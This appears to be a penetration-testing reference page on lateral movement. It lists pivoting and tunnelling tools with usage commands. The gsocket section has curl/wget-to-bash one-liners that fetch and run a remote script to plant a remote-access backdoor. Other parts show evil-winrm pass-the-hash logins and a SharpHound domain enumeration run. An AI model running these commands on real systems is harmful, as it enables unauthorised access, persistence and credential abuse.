# Lateral Movement

[**Neo-reGeorg**](https://github.com/L-codes/Neo-reGeorg): The successor to reDuh, pwn a bastion webserver and create SOCKS proxies through the DMZ. Pivot and pwn.

[**Tunna**](https://github.com/SECFORCE/Tunna): Tunna is a set of tools which will wrap and tunnel any TCP communication over HTTP. It can be used to bypass network restrictions in fully firewalled environments.

[**pivotnacci**](https://github.com/blackarrowsec/pivotnacci)**:** Pivot into the internal network by deploying HTTP agents. Pivotnacci allows you to create a socks server that communicates with HTTP `agents`. The architecture looks like the following:

![](/files/-MYKe391DPjhNuDFPf3r)

[**ngrok**](https://ngrok.com/): Spend more time programming. One command for an instant, secure URL to your localhost server through any NAT or firewall.

[**gsocket**](https://github.com/hackerschoice/gsocket)**:** The Global Socket Toolkit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.

Use either one of these two commands to *deploy*:

```
bash -c "$(curl -fsSL gsocket.io/x)"
bash -c "$(wget -qO- gsocket.io/x)"
```

![](/files/-MZ9NPDjsl7MZ_phLOd_)

Use either one of these two commands to *uninstall*:

```
GS_UNDO=1 bash -c "$(curl -fsSL gsocket.io/x)"
GS_UNDO=1 bash -c "$(wget -qO- gsocket.io/x)"
```

Access the remote host from anywhere in the world:

```
$ gs-netcat -s ExampleSecretChangeMe -i
```

![](/files/-MZ9NRYvSTcsxKTESBHa)

{% embed url="<https://youtu.be/tmf9VGDPILE>" %}

{% embed url="<https://www.gsocket.io/deploy/>" %}

[**evil-winrm**](https://github.com/Hackplayers/evil-winrm)**:** This shell is the ultimate WinRM shell for hacking/pentesting.

```
ruby evil-winrm.rb -i 10.10.10.161 -u username -p passw0rd
ruby evil-winrm.rb -i 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79
ruby evil-winrm.rb -i 10.10.10.149 -u 'DOMAIN\USER' -p 'passw0rd'
```

**proxychains windows**

```
.\proxychains_win32_x64.exe -f .\proxychains.conf C:\Users\IEUser\Downloads\SharpHound.exe --collectionmethods All
```

{% embed url="<https://github.com/shunf4/proxychains-windows>" %}


